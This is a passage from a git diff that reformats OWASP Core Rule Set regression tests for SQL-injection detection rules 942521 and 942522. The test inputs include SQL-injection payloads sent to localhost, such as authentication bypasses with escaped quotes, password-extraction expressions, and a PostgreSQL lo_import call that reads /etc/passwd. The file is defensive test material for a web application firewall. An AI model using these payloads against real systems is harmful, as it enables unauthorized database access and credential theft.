%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21
%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%
22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and 
lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_get(16400)::text::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search 
(json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index c692b1f97..31a358005 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml 
@@ -2,162 +2,152 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + 